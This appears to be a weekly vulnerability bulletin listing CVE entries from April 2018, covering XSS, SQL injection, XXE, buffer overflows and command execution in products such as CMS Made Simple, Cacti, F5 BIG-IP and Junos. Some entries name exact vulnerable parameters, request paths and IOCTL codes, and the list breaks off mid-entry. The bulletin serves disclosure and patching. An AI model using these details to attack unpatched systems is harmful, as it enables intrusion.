MISCcmsmadesimple -- cms_made_simple CMS Made Simple (CMSMS) through 2.2.7 contains an arbitrary code execution vulnerability in the admin dashboard because the implementation uses "eval('function testfunction'.rand()" and it is possible to bypass certain restrictions on these "testfunction" functions. 2018-04-13 6.5 CVE-2018-10086
MISCLow Vulnerabilities
Back to topPrimary
Vendor -- ProductDescription Published CVSS Score Source & Patch Info cacti -- cacti Cacti before 1.1.37 has XSS because it does not properly reject unintended characters, related to use of the sanitize_uri function in lib/functions.php. 2018-04-12 3.5 CVE-2018-10060
MISC
MISCcacti -- cacti Cacti before 1.1.37 has XSS because it makes certain htmlspecialchars calls without the ENT_QUOTES flag (these calls occur when the html_escape function in lib/html.php is not used). 2018-04-12 3.5 CVE-2018-10061
MISC
MISCcmsmadesimple -- cms_made_simple CMS Made Simple (aka CMSMS) 2.2.7 has Reflected XSS in admin/moduleinterface.php via the m1_name parameter, related to moduledepends, a different vulnerability than CVE-2017-16799. 2018-04-11 3.5 CVE-2018-10029
MISCcmsmadesimple -- cms_made_simple CMS Made Simple (aka CMSMS) 2.2.7 has Reflected XSS in admin/moduleinterface.php via the m1_version parameter. 2018-04-11 3.5 CVE-2018-10032
MISCcmsmadesimple -- cms_made_simple CMS Made Simple (aka CMSMS) 2.2.7 has Stored XSS in admin/siteprefs.php via the metadata parameter. 2018-04-11 3.5 CVE-2018-10033
MISCSeverity Not Yet Assigned
Back to topPrimary
Vendor -- ProductDescription Published CVSS Score Source & Patch Info apache -- solr
This vulnerability in Apache Solr 1.2 to 6.6.2 and 7.0.0 to 7.2.1 relates to an XML external entity expansion (XXE) in the `&dataConfig=<inlinexml>` parameter of Solr's DataImportHandler. It can be used as XXE using file/ftp/http protocols in order to read arbitrary local files from the Solr server or the internal network. 2018-04-09 not yet calculated CVE-2018-1308
CONFIRM
MLISTapple -- ios_and_macos
An issue was discovered in certain Apple products. iOS before 11.3 is affected. macOS before 10.13.4 is affected. The issue involves the "Status Bar" component. It allows invisible microphone access via a crafted app. 2018-04-13 not yet calculated CVE-2018-4173
CONFIRM
CONFIRMarista -- eos
Arista EOS before 4.20.2F allows remote BGP peers to cause a denial of service (Rib agent restart) via a malformed path attribute in an UPDATE message. 2018-04-12 not yet calculated CVE-2018-5254
CONFIRMarm -- mbed_tls
ARM mbed TLS before 2.1.11, before 2.7.2, and before 2.8.0 has a buffer over-read in ssl_parse_server_psk_hint() that could cause a crash on invalid input. 2018-04-10 not yet calculated CVE-2018-9989
CONFIRM
CONFIRM
CONFIRMarm -- mbed_tls
ARM mbed TLS before 2.1.11, before 2.7.2, and before 2.8.0 has a buffer over-read in ssl_parse_server_key_exchange() that could cause a crash on invalid input. 2018-04-10 not yet calculated CVE-2018-9988
CONFIRM
CONFIRM
CONFIRMatlassian -- application_links
Various administrative application link resources in Atlassian Application Links before version 5.4.4 allow remote attackers with administration rights to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the display url of a configured application link. 2018-04-10 not yet calculated CVE-2018-5227
BID
CONFIRMatlassian -- jira
The agile wallboard gadget in Atlassian Jira before version 7.8.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the name of quick filters. 2018-04-10 not yet calculated CVE-2017-18100
BID
CONFIRMatlassian -- jira
Various administrative external system import resources in Atlassian JIRA Server (including JIRA Core) before version 7.6.5, from version 7.7.0 before version 7.7.3, from version 7.8.0 before version 7.8.3 and before version 7.9.0 allow remote attackers to run import operations and to determine if an internal service exists through missing permission checks. 2018-04-10 not yet calculated CVE-2017-18101
BID
CONFIRMbotan -- botan
An issue was discovered in Botan 1.11.32 through 2.x before 2.6.0. An off-by-one error when processing malformed TLS-CBC ciphertext could cause the receiving side to include in the HMAC computation exactly 64K bytes of data following the record buffer, aka an over-read. The MAC comparison will subsequently fail and the connection will be closed. This could be used for denial of service. No information leak occurs. 2018-04-12 not yet calculated CVE-2018-9860
MISC
MISCbuffalo -- wzr-1750dhp2_firmware
Buffer overflow in Buffalo WZR-1750DHP2 Ver.2.30 and earlier allows an attacker to execute arbitrary code via a specially crafted file. 2018-04-09 not yet calculated CVE-2018-0555
CONFIRM
JVNbuffalo -- wzr-1750dhp2_firmware
Buffalo WZR-1750DHP2 Ver.2.30 and earlier allows an attacker to bypass authentication and execute arbitrary commands on the device via unspecified vectors. 2018-04-09 not yet calculated CVE-2018-0554
CONFIRM
JVNbuffalo -- wzr-1750dhp2_firmware
Buffalo WZR-1750DHP2 Ver.2.30 and earlier allows an attacker to execute arbitrary OS commands via unspecified vectors. 2018-04-09 not yet calculated CVE-2018-0556
CONFIRM
JVNca_technologies -- ca_workload_automation
CA Workload Automation AE before r11.3.6 SP7 allows remote attackers to a perform SQL injection via a crafted HTTP request. 2018-04-11 not yet calculated CVE-2018-8953
BID
SECTRACK
CONFIRMca_technologies -- ca_workload_control_center
CA Workload Control Center before r11.4 SP6 allows remote attackers to execute arbitrary code via a crafted HTTP request. 2018-04-11 not yet calculated CVE-2018-8954
BID
SECTRACK
CONFIRMcacti -- cacti
Cacti before 1.1.37 has XSS because the get_current_page function in lib/functions.php relies on $_SERVER['PHP_SELF'] instead of $_SERVER['SCRIPT_NAME'] to determine a page name. 2018-04-12 not yet calculated CVE-2018-10059
MISC
MISCcatfish -- catfish
Catfish CMS V4.7.21 allows XSS via the pinglun parameter to cat/index/index/pinglun (aka an authenticated comment). 2018-04-11 not yet calculated CVE-2018-10023
MISCcms_made_simple -- cms_made_simple
CMS Made Simple (CMSMS) through 2.2.6 contains an admin password reset vulnerability because data values are improperly compared, as demonstrated by a hash beginning with the "0e" substring. 2018-04-13 not yet calculated CVE-2018-10081
MISCcockpit -- cockpit
SSRF (Server Side Request Forgery) in Cockpit 0.13.0 allows remote attackers to read arbitrary files or send TCP traffic to intranet hosts via the url parameter, related to use of the discontinued aheinze/fetch_url_contents component. 2018-04-10 not yet calculated CVE-2017-14611
FULLDISCcomputerinsel -- photoline A specially crafted TIFF image processed via the application can lead to an out-of-bounds write, overwriting 2018-04-12 not yet calculated CVE-2018-3862
MISCcomputerinsel -- photoline
A memory corruption vulnerability exists in the PCX-parsing functionality of Computerinsel Photoline 20.53. A specially crafted PCX image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a PCX image to trigger this vulnerability and gain code execution. 2018-04-11 not yet calculated CVE-2018-3887
MISCcomputerinsel -- photoline
A memory corruption vulnerability exists in the PCX-parsing functionality of Computerinsel Photoline 20.53. A specially crafted PCX image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a PCX image to trigger this vulnerability and gain code execution. 2018-04-11 not yet calculated CVE-2018-3888
MISCcomputerinsel -- photoline
A memory corruption vulnerability exists in the PCX-parsing functionality of Computerinsel Photoline 20.53. A specially crafted PCX image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a PCX image to trigger this vulnerability and gain code execution. 2018-04-11 not yet calculated CVE-2018-3886
MISCcomputerinsel -- photoline
A specially crafted TIFF image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a TIFF image to trigger this vulnerability and gain code execution. 2018-04-12 not yet calculated CVE-2018-3868
MISCcomputerinsel -- photoline
A specially crafted TIFF image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a TIFF image to trigger this vulnerability and gain code execution. 2018-04-12 not yet calculated CVE-2018-3861
MISCcomputerinsel -- photoline
A specially crafted PCX image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a PCX image to trigger this vulnerability and gain code execution. 2018-04-12 not yet calculated CVE-2018-3889
MISCcorosync -- corosync
corosync before version 2.4.4 is vulnerable to an integer overflow in exec/totemcrypto.c. 2018-04-12 not yet calculated CVE-2018-1084
MISCcoship -- rt3052_wireless_router
Coship RT3052 4.0.0.48 devices allow XSS via a crafted SSID field on the "Wireless Setting - Basic" screen. 2018-04-10 not yet calculated CVE-2018-8772
MISCcyberark -- password_vault_web_access
The REST API in CyberArk Password Vault Web Access before 9.9.5 and 10.x before 10.1 allows remote attackers to execute arbitrary code via a serialized .NET object in an Authorization HTTP header. 2018-04-12 not yet calculated CVE-2018-9843
FULLDISC
BUGTRAQ
SECTRACK
EXPLOIT-DB
MISCcyberark -- password_vault
CyberArk Password Vault before 9.7 allows remote attackers to obtain sensitive information from process memory by replaying a logon message. 2018-04-12 not yet calculated CVE-2018-9842
FULLDISC
BUGTRAQ
SECTRACK
EXPLOIT-DB
MISCd-link -- dir-815_devices
D-Link DIR-815 devices with firmware before 2.07.B01 allow remote attackers to obtain sensitive information by leveraging cleartext storage of the wireless key. 2018-04-12 not yet calculated CVE-2015-0153
CONFIRM
XFd-link -- dir-815_devices
Cross-site request forgery (CSRF) vulnerability in D-Link DIR-815 devices with firmware before 2.07.B01 allows remote attackers to hijack the authentication of arbitrary users for requests that insert XSS sequences. 2018-04-12 not yet calculated CVE-2015-0151
CONFIRM
XFd-link -- dir-815_devices
D-Link DIR-815 devices with firmware before 2.07.B01 allow remote attackers to obtain sensitive information by leveraging cleartext storage of the administrative password. 2018-04-12 not yet calculated CVE-2015-0152
CONFIRM
XFd-link -- dir-815_devices
The remote administration interface in D-Link DIR-815 devices with firmware before 2.03.B02 allows remote attackers to execute arbitrary commands via vectors related to an "HTTP command injection issue." 2018-04-12 not yet calculated CVE-2014-8888
CONFIRM
XFd-link -- dir-815_devices
The remote administration UI in D-Link DIR-815 devices with firmware before 2.07.B01 allows remote attackers to bypass intended access restrictions via unspecified vectors. 2018-04-12 not yet calculated CVE-2015-0150
CONFIRM
XFdassault -- systemes_catia
Stack-based buffer overflow in Dassault Systemes CATIA V5-6R2013 allows remote attackers to execute arbitrary code via a crafted packet, related to "CATV5_Backbone_Bus." 2018-04-10 not yet calculated CVE-2014-2073
MISCdatomic -- datomic
H2 1.4.197, as used in Datomic before 0.9.5697 and other products, allows remote code execution because CREATE ALIAS can execute arbitrary Java code. 2018-04-11 not yet calculated CVE-2018-10054
MISC
MISC
MISC
EXPLOIT-DBdell_emc -- avamar_server_and_integrated_data_protection_appliance
Avamar Installation Manager in Dell EMC Avamar Server 7.3.1, 7.4.1, and 7.5.0, and Dell EMC Integrated Data Protection Appliance 2.0 and 2.1, is affected by a missing access control check vulnerability which could potentially allow a remote unauthenticated attacker to read or change the Local Download Service (LDLS) credentials. The LDLS credentials are used to connect to Dell EMC Online Support. If the LDLS configuration was changed to an invalid configuration, then Avamar Installation Manager may not be able to connect to Dell EMC Online Support web site successfully. The remote unauthenticated attacker can also read and use the credentials to login to Dell EMC Online Support, impersonating the AVI service actions using those credentials. 2018-04-09 not yet calculated CVE-2018-1217
FULLDISC
SECTRACK
EXPLOIT-DBdiffoscope -- diffoscope
diffoscope before 77 writes to arbitrary locations on disk based on the contents of an untrusted archive. 2018-04-13 not yet calculated CVE-2017-0359
CONFIRM
CONFIRMdocker -- docker
util.c in runV 1.0.0 for Docker mishandles a numeric username, which allows attackers to obtain root access by leveraging the presence of an initial numeric value on an /etc/passwd line, and then issuing a "docker exec" command with that value in the -u argument, a similar issue to CVE-2016-3697. 2018-04-09 not yet calculated CVE-2018-9862
BID
CONFIRMdolibarr -- dolibarr
Dolibarr ERP/CRM is affected by stored Cross-Site Scripting (XSS) in versions through 7.0.0. 2018-04-10 not yet calculated CVE-2017-18259
MISCdolibarr -- dolibarr
Dolibarr ERP/CRM is affected by SQL injection in versions before 5.0.4 via product/stats/card.php (type parameter). 2018-04-10 not yet calculated CVE-2017-9839
MISCdolibarr -- dolibarr
Dolibarr ERP/CRM is affected by multiple reflected Cross-Site Scripting (XSS) vulnerabilities in versions before 5.0.4: index.php (leftmenu parameter), core/ajax/box.php (PATH_INFO), product/stats/card.php (type parameter), holiday/list.php (month_create, month_start, and month_end parameters), and don/card.php (societe, lastname, firstname, address, zipcode, town, and email parameters). 2018-04-10 not yet calculated CVE-2017-9838
MISCdolibarr -- dolibarr
Dolibarr ERP/CRM is affected by multiple SQL injection vulnerabilities in versions through 7.0.0 via comm/propal/list.php (viewstatut parameter) or comm/propal/list.php (propal_statut parameter, aka search_statut parameter). 2018-04-10 not yet calculated CVE-2017-18260
MISCdrupal -- drupal
The entity wrapper access API in the Entity API module 7.x-1.x before 7.x-1.3 for Drupal might allow remote authenticated users to bypass intended access restrictions on referenced entities via unspecified vectors. 2018-04-10 not yet calculated CVE-2014-1399
FEDORA
FEDORA
MLIST
BID
CONFIRM
XF
MISCdrupal -- drupal
The entity_access API in the Entity API module 7.x-1.x before 7.x-1.3 for Drupal might allow remote authenticated users to bypass intended access restrictions and read unpublished comments via unspecified vectors. 2018-04-10 not yet calculated CVE-2014-1400
FEDORA
FEDORA
MLIST
BID
CONFIRM
XF
MISCdrupal -- drupal
The entity wrapper access API in the Entity API module 7.x-1.x before 7.x-1.3 for Drupal might allow remote authenticated users to bypass intended access restrictions on comment, user and node statistics properties via unspecified vectors. 2018-04-10 not yet calculated CVE-2014-1398
FEDORA
FEDORA
MLIST
BID
CONFIRM
XF
MISCf5 -- big-ip
On F5 BIG-IP versions 13.0.0, 12.1.0-12.1.3.1, 11.6.1-11.6.2, or 11.5.1-11.5.5, vCMP guests running on VIPRION 2100, 4200 and 4300 series blades cannot correctly decrypt ciphertext from established SSL sessions with small MTU. 2018-04-13 not yet calculated CVE-2018-5507
CONFIRMf5 -- big-ip
On F5 BIG-IP PEM versions 13.0.0, 12.0.0-12.1.3.1, 11.6.0-11.6.2, 11.5.1-11.5.5, or 11.2.1, under certain conditions, TMM may crash when processing compressed data though a Virtual Server with an associated PEM profile using the content insertion option. 2018-04-13 not yet calculated CVE-2018-5508
CONFIRMf5 -- big-ip
In F5 BIG-IP 13.0.0, 12.1.0-12.1.2, 11.6.1, 11.5.1-11.5.5, or 11.2.1 the Apache modules apache_auth_token_mod and mod_auth_f5_auth_token.cpp allow possible unauthenticated bruteforce on the em_server_ip authorization parameter to obtain which SSL client certificates used for mutual authentication between BIG-IQ or Enterprise Manager (EM) and managed BIG-IP devices. 2018-04-13 not yet calculated CVE-2018-5506
CONFIRMf5 -- big-ip
On F5 BIG-IP 13.1.0-13.1.0.3 or 13.0.0, when authenticated administrative users execute commands in the Traffic Management User Interface (TMUI), also referred to as the BIG-IP Configuration utility, restrictions on allowed commands may not be enforced. 2018-04-13 not yet calculated CVE-2018-5511
CONFIRMf5 -- big-ip
On F5 BIG-IP 11.5.4 HF4-11.5.5, the Traffic Management Microkernel (TMM) may restart when processing a specific sequence of packets on IPv6 virtual servers. 2018-04-13 not yet calculated CVE-2018-5510
CONFIRMf5 -- big-ip
In F5 BIG-IP 12.0.0-12.1.2, 11.6.0-11.6.1, 11.5.1-11.5.5, or 11.2.1 there is a vulnerability in TMM related to handling of invalid IP addresses. 2018-04-13 not yet calculated CVE-2017-6158
CONFIRMf5 -- big-ip
Responses to SOCKS proxy requests made through F5 BIG-IP version 13.0.0, 12.0.0-12.1.3.1, 11.6.1-11.6.2, or 11.5.1-11.5.5 may cause a disruption of services provided by TMM. The data plane is impacted and exposed only when a SOCKS proxy profile is attached to a Virtual Server. The control plane is not impacted by this vulnerability. 2018-04-13 not yet calculated CVE-2017-6148
CONFIRMf5 -- big-ip
X509 certificate verification was not correctly implemented in the IP Intelligence Subscription and IP Intelligence feed-list features, and thus the remote server's identity is not properly validated in F5 BIG-IP 12.0.0-12.1.2, 11.6.0-11.6.2, or 11.5.0-11.5.5. 2018-04-13 not yet calculated CVE-2017-6143
CONFIRMf5 -- big-ip
On F5 BIG-IP 13.0.0, 12.0.0-12.1.3.1, 11.6.0-11.6.2, 11.4.1-11.5.5, or 11.2.1, malformed SPDY or HTTP/2 requests may result in a disruption of service to TMM. Data plane is only exposed when a SPDY or HTTP/2 profile is attached to a virtual server. There is no control plane exposure. 2018-04-13 not yet calculated CVE-2017-6155
CONFIRMf5 -- big-ip
When the F5 BIG-IP 12.1.0-12.1.1, 11.6.0-11.6.1, 11.5.1-11.5.5, or 11.2.1 system is configured with a wildcard IPSec tunnel endpoint, it may allow a remote attacker to disrupt or impersonate the tunnels that have completed phase 1 IPSec negotiations. The attacker must possess the necessary credentials to negotiate the phase 1 of the IPSec exchange to exploit this vulnerability; in many environment this limits the attack surface to other endpoints under the same administration. 2018-04-13 not yet calculated CVE-2017-6156
CONFIRMffmpeg -- ffmpeg
The decode_init function in libavcodec/utvideodec.c in FFmpeg through 3.4.2 allows remote attackers to cause a denial of service (out of array read) via an AVI file. 2018-04-10 not yet calculated CVE-2018-10001
MISC
BIDfreebsd -- freebsd
In FreeBSD before 11.0-STABLE, 11.0-RELEASE-p10, 10.3-STABLE, and 10.3-RELEASE-p19, ipfilter using "keep state" or "keep frags" options can cause a kernel panic when fed specially crafted packet fragments due to incorrect memory handling. 2018-04-10 not yet calculated CVE-2017-1081
BID
SECTRACK
FREEBSDfrog_cms -- frog_cms
Frog CMS 0.9.5 has XSS via the name field of a new "File" or "Directory" on the admin/?/plugin/file_manager/browse/ screen. 2018-04-11 not yet calculated CVE-2018-9992
MISCfrog_cms -- frog_cms
Frog CMS 0.9.5 has XSS via the /admin/?/user/add Name or Username parameter. 2018-04-11 not yet calculated CVE-2018-9991
MISCfuse -- fuse
Jann Horn of Google Project Zero discovered that NTFS-3G, a read-write NTFS driver for FUSE, does not scrub the environment before executing modprobe with elevated privileges. A local user can take advantage of this flaw for local root privilege escalation. 2018-04-13 not yet calculated CVE-2017-0358
MLIST
BID
MLIST
DEBIAN
GENTOO
EXPLOIT-DB
EXPLOIT-DBglamo -- iremoconwifi_app_for_android
The iRemoconWiFi App for Android version 4.1.7 and earlier does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate. 2018-04-09 not yet calculated CVE-2018-0553
JVN
MISCgnu -- binutils
An issue was discovered in cplus-dem.c in GNU libiberty, as distributed in GNU Binutils 2.30. Stack Exhaustion occurs in the C++ demangling functions provided by libiberty, and there are recursive stack frames: demangle_template_value_parm, demangle_integral_value, and demangle_expression. 2018-04-10 not yet calculated CVE-2018-9996
BID
MISCgnu -- patch
GNU Patch version 2.7.6 contains an input validation vulnerability when processing patch files, specifically the EDITOR_PROGRAM invocation (using ed) can result in code execution. This attack appear to be exploitable via a patch file processed via the patch utility. This is similar to FreeBSD's CVE-2015-1418 however although they share a common ancestry the code bases have diverged over time. 2018-04-06 not yet calculated CVE-2018-1000156
MISC
MISC
CONFIRM
MISC
UBUNTUgoogle -- chrome
The Video Downloader professional extension before 2018-04-05 for Chrome has Universal XSS (UXSS) via vectors related to a link64_msgAddLinks event. 2018-04-10 not yet calculated CVE-2018-10000
MISChorde -- horde_ldap
The Horde_Ldap library before 2.0.6 for Horde allows remote attackers to bypass authentication by leveraging knowledge of the LDAP bind user DN. 2018-04-10 not yet calculated CVE-2014-3999
MLIST
BID
CONFIRM
CONFIRM
MLISThuawei -- mate_9_mobile_phones
The Near Field Communication (NFC) module in Mate 9 Huawei mobile phones with the versions before MHA-L29B 8.0.0.366(C567) has an information leak vulnerability due to insufficient validation on data transfer requests. When an affected mobile phone sends files to an attacker's mobile phone using the NFC function, the attacker can obtain arbitrary files from the mobile phone, causing information leaks. 2018-04-11 not yet calculated CVE-2018-7930
CONFIRMhuawei -- multiple_products
SCCPX module in Huawei DP300 V500R002C00, RP200 V500R002C00, V600R006C00, TE30 V100R001C10, V500R002C00, V600R006C00, TE40 V500R002C00, V600R006C00, TE50 V500R002C00, V600R006C00, TE60 V100R001C10, V500R002C00, V600R006C00 has an invalid memory access vulnerability. An unauthenticated, remote attacker may send specially crafted packets to the affected products. Due to insufficient validation of packets, successful exploit may cause some services abnormal. 2018-04-11 not yet calculated CVE-2017-17308
CONFIRMhuawei -- switch_products
S12700 V200R005C00, V200R006C00, V200R006C01, V200R007C00, V200R007C01, V200R007C20, V200R008C00, V200R008C06, V200R009C00, V200R010C00, S7700 V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R006C01, V200R007C00, V200R007C01, V200R008C00, V200R008C06, V200R009C00, V200R010C00, S9700 V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R006C01, V200R007C00, V200R007C01, V200R008C00, V200R009C00, V200R010C00 have an improper authorization vulnerability on Huawei switch products. The system incorrectly performs an authorization check when a normal user attempts to access certain information which is supposed to be accessed only by authenticated user. Successful exploit could cause information disclosure. 2018-04-11 not yet calculated CVE-2017-15327
CONFIRMhuawei -- themes_app_honor_8_lite_mobile_phones
The Themes App Honor 8 Lite Huawei mobile phones with software of versions before Prague-L31C576B172, versions before Prague-L31C530B160, versions before Prague-L31C432B180 has a man-in-the-middle (MITM) vulnerability due to the use of the insecure HTTP protocol for theme download. An attacker may exploit this vulnerability to tamper with downloaded themes. 2018-04-11 not yet calculated CVE-2017-8154
CONFIRMibm -- doors_next_generation
IBM DOORS Next Generation (DNG/RRC) 5.0, 5.0.1, 5.0.2, and 6.0 through 6.0.5 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 137035. 2018-04-12 not yet calculated CVE-2017-1790
CONFIRM
MISCibm -- forms_experience_builder
Cross-site scripting (XSS) vulnerability in IBM Forms Experience Builder 8.5.0 and 8.5.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. IBM X-Force ID: 97777. 2018-04-12 not yet calculated CVE-2014-6169
XFibm -- rational_appscan_source_and_security_appscan_source
IBM Rational AppScan Source 8.0 through 8.0.0.2 and 8.5 through 8.5.0.1 and Security AppScan Source 8.6 through 8.6.0.2, 8.7 through 8.7.0.1, 8.8, 9.0 through 9.0.0.1, and 9.0.1 allow remote attackers to execute arbitrary commands on the installation server via unspecified vectors. IBM X-Force ID: 96721. 2018-04-12 not yet calculated CVE-2014-6120
XFibm -- security_siteprotector_system
IBM Security SiteProtector System 3.0, 3.1.0 and 3.1.1 allows remote attackers to bypass intended security restrictions and consequently execute unspecified commands and obtain sensitive information via unknown vectors. IBM X-Force ID: 100927. 2018-04-10 not yet calculated CVE-2015-0172
CONFIRMibm -- websphere_mq
IBM WebSphere MQ 7.5.x before 7.5.0.6 and 8.0.x before 8.0.0.3 allows remote authenticated users to obtain sensitive information via a man-in-the-middle attack, related to duplication of message data in cleartext outside the protected payload. IBM X-Force ID: 103482. 2018-04-10 not yet calculated CVE-2015-1957
CONFIRM
XFibm -- websphere_mq
IBM WebSphere Portal 8.5 and 9.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 140918. 2018-04-11 not yet calculated CVE-2018-1483
SECTRACK
MISC
CONFIRMidreamsoft_icms -- idreamsoft_icms
An issue was discovered in idreamsoft iCMS through 7.0.7. CSRF exists in admincp.php, as demonstrated by adding an article via an app=article&do=save&frame=iPHP request. 2018-04-10 not yet calculated CVE-2018-9923
MISCidreamsoft_icms -- idreamsoft_icms
An issue was discovered in idreamsoft iCMS through 7.0.7. SQL injection exists via the pid array parameter in an admincp.php?app=tag&do=save&frame=iPHP request. 2018-04-10 not yet calculated CVE-2018-9924
MISCidreamsoft_icms -- idreamsoft_icms
An issue was discovered in idreamsoft iCMS through 7.0.7. Physical path leakage exists via an invalid nickname field that reveals a core/library/weixin.class.php pathname. 2018-04-10 not yet calculated CVE-2018-9922
MISCidreamsoft_icms -- idreamsoft_icms
An issue was discovered in idreamsoft iCMS through 7.0.7. XSS exists via the nickname field in an admincp.php?app=user&do=save&frame=iPHP request. 2018-04-10 not yet calculated CVE-2018-9925
MISCikiwiki -- ikiwiki
ikiwiki before 3.20161229 incorrectly called the CGI::FormBuilder->field method (similar to the CGI->param API that led to Bugzilla's CVE-2014-1572), which can be abused to lead to commit metadata forgery. 2018-04-13 not yet calculated CVE-2016-9646
CONFIRM
MLIST
CONFIRM
DEBIANikiwiki -- ikiwiki
The fix for ikiwiki for CVE-2016-10026 was incomplete resulting in editing restriction bypass for git revert when using git versions older than 2.8.0. This has been fixed in 3.20161229. 2018-04-10 not yet calculated CVE-2016-9645
MISC
MISC
MISCikiwiki -- ikiwiki
A flaw, similar to to CVE-2016-9646, exists in ikiwiki before 3.20170111, in the passwordauth plugin's use of CGI::FormBuilder, allowing an attacker to bypass authentication via repeated parameters. 2018-04-13 not yet calculated CVE-2017-0356
BID
CONFIRM
MLIST
DEBIANiscripts -- eswap
iScripts eSwap v2.4 has CSRF via "registration_settings.php" in the Admin Panel. 2018-04-11 not yet calculated CVE-2018-10048
MISCiscripts -- eswap
iScripts eSwap v2.4 has SQL injection via the "registration_settings.php" ddlFree parameter in the Admin Panel. 2018-04-11 not yet calculated CVE-2018-10050
MISCiscripts -- eswap
iScripts eSwap v2.4 has XSS via the "registration_settings.php" txtDate parameter in the Admin Panel. 2018-04-11 not yet calculated CVE-2018-10049
MISCiscripts -- supportdesk
iScripts SupportDesk v4.3 has XSS via the staff/inteligentsearchresult.php txtinteligentsearch parameter. 2018-04-11 not yet calculated CVE-2018-10051
MISCiscripts -- supportdesk
iScripts SupportDesk v4.3 has XSS via the admin/inteligentsearchresult.php txtinteligentsearch parameter. 2018-04-11 not yet calculated CVE-2018-10052
MISCiucode-tool -- iucode-tool
A heap-overflow flaw exists in the -tr loader of iucode-tool starting with v1.4 and before v2.1.1, potentially leading to SIGSEGV, or heap corruption. 2018-04-13 not yet calculated CVE-2017-0357
BID
CONFIRM
CONFIRMjenkins -- jenkins
Jenkins before versions 2.44 and 2.32.2 is vulnerable to an insufficient permission check. This allows users with permissions to create new items (e.g. jobs) to overwrite existing items they don't have access to (SECURITY-321). 2018-04-11 not yet calculated CVE-2017-2599
BID
CONFIRM
CONFIRM
CONFIRMjoomla! -- joomla!
The Convert Forms extension before 2.0.4 for Joomla! is vulnerable to Remote Command Execution using CSV Injection that is mishandled when exporting a Leads file. 2018-04-12 not yet calculated CVE-2018-10063
EXPLOIT-DB
MISCjoomla! -- joomla!
The jDownloads extension before 3.2.59 for Joomla! has XSS. 2018-04-12 not yet calculated CVE-2018-10068
MISC
MISCjoyplus-cms -- joyplus-cms
joyplus-cms 1.6.0 allows remote attackers to obtain sensitive information via a direct request to the install/ or log/ URI. 2018-04-11 not yet calculated CVE-2018-10028
MISCjoyplus-cms -- joyplus-cms
joyplus-cms 1.6.0 has XSS via the device_name parameter in a manager/admin_ajax.php?action=save flag=add request. 2018-04-13 not yet calculated CVE-2018-10096
MISCjoyplus-cms -- joyplus-cms
joyplus-cms 1.6.0 has XSS in manager/admin_vod.php via the keyword parameter. 2018-04-12 not yet calculated CVE-2018-10073
MISCjungo -- driverwizard_windriver
windrvr1260.sys in Jungo DriverWizard WinDriver 12.6.0 allows attackers to cause a denial of service (BSOD) via a 0x953827bf DeviceIoControl call. 2018-04-12 not yet calculated CVE-2018-10072
MISCjungo -- driverwizard_windriver
windrvr1260.sys in Jungo DriverWizard WinDriver 12.6.0 allows attackers to cause a denial of service (BSOD) via a 0x953826DB DeviceIoControl call. 2018-04-12 not yet calculated CVE-2018-10071
MISCjuniper_networks -- junos_os
Receipt of a specially crafted Connectionless Network Protocol (CLNP) datagram destined to an interface of a Junos OS device may result in a kernel crash or lead to remote code execution. Devices are only vulnerable to the specially crafted CLNP datagram if 'clns-routing' or ES-IS is explicitly configured. Devices with without CLNS enabled are not vulnerable to this issue. Devices with IS-IS configured on the interface are not vulnerable to this issue unless CLNS routing is also enabled. This issue only affects devices running Junos OS 15.1. Affected releases are Juniper Networks Junos OS: 15.1 versions prior to 15.1F5-S3, 15.1F6-S8, 15.1F7, 15.1R5; 15.1X49 versions prior to 15.1X49-D60; 15.1X53 versions prior to 15.1X53-D66, 15.1X53-D233, 15.1X53-D471. Earlier releases are unaffected by this vulnerability, and the issue has been resolved in Junos OS 16.1R1 and all subsequent releases. 2018-04-11 not yet calculated CVE-2018-0016
BID
CONFIRMjuniper_networks -- junos_os
A vulnerability in the Network Address Translation - Protocol Translation (NAT-PT) feature of Junos OS on SRX series devices may allow a certain valid IPv6 packet to crash the flowd daemon. Repeated crashes of the flowd daemon can result in an extended denial of service condition for the SRX device. Affected releases are Juniper Networks Junos OS: 12.1X46 versions prior to 12.1X46-D72; 12.3X48 versions prior to 12.3X48-D55; 15.1X49 versions prior to 15.1X49-D90. 2018-04-11 not yet calculated CVE-2018-0017
BID
CONFIRMjuniper_networks -- junos_os
A vulnerability in Junos OS SNMP MIB-II subagent daemon (mib2d) may allow a remote network based attacker to cause the mib2d process to crash resulting in a denial of service condition (DoS) for the SNMP subsystem. While a mib2d process crash can disrupt the network monitoring via SNMP, it does not impact routing, switching or firewall functionalities. SNMP is disabled by default on devices running Junos OS. Affected releases are Juniper Networks Junos OS: 12.1X46 versions prior to 12.1X46-D76; 12.3 versions prior to 12.3R12-S7, 12.3R13; 12.3X48 versions prior to 12.3X48-D65; 14.1 versions prior to 14.1R9; 14.1X53 versions prior to 14.1X53-D130; 15.1 versions prior to 15.1F2-S20, 15.1F6-S10, 15.1R7; 15.1X49 versions prior to 15.1X49-D130; 15.1X53 versions prior to 15.1X53-D233, 15.1X53-D471, 15.1X53-D472, 15.1X53-D58, 15.1X53-D66; 16.1 versions prior to 16.1R5-S3, 16.1R7; 16.1X65 versions prior to 16.1X65-D47; 16.1X70 versions prior to 16.1X70-D10; 16.2 versions prior to 16.2R1-S6, 16.2R2-S5, 16.2R3; 17.1 versions prior to 17.1R2-S6, 17.1R3; 2018-04-11 not yet calculated CVE-2018-0019
CONFIRMjuniper_networks -- junos_os
